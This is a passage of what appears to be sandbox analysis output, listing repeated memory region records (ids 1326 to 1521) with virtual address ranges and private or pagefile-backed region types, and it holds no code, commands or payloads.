= 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1326 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 1327 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1328 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1329 start_va = 0x580000 end_va = 0x582fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1330 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1331 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1332 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1333 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1334 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1335 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1336 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1337 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1338 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1339 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1340 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1341 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1342 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1343 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1344 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1345 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1346 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1347 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1348 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1349 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1350 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1351 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1352 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1353 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1354 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1355 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1356 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1357 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1358 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1359 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1360 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1361 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1362 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1363 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1364 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1365 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1366 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1367 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1368 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1369 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1370 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1371 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1372 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1373 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1374 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1375 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1376 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1377 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1378 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1379 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1380 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1381 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1382 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1383 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1384 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1385 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1386 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1387 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1388 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1389 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1390 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1391 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1392 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1393 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1394 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1395 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1396 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1397 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1398 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1399 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1400 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1401 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1402 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1403 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1404 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1405 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1406 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1407 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1408 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1409 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1410 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1411 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1412 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1413 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1414 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1415 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1416 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1417 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1418 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1419 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1420 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1421 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1422 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1423 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1424 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1425 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1426 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1427 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1428 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1429 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1430 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1431 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1432 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1433 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1434 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1435 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1436 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1437 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1438 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1439 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1440 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1441 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1442 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1443 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1444 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1445 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1446 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1447 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1448 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1449 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1450 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1451 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1452 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1453 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1454 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1455 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1456 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1457 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1458 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1459 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1460 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1461 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1462 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1463 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1464 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1465 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1466 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1467 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1468 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1469 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1470 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1471 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1472 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1473 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1474 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1475 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1476 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1477 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1478 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1479 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1480 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1481 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1482 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1483 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1484 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1485 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1486 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1487 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1488 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1489 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1490 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1491 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1492 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1493 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1494 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1495 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1496 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1497 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1498 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1499 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1500 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1501 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1502 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1503 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1504 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1505 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1506 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1507 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1508 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1509 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1510 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1511 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1512 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1513 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1514 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1515 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1516 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1517 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1518 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1519 start_va = 0xf890000 end_va = 0xfd85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f890000" filename = "" Region: id = 1520 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1521 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" 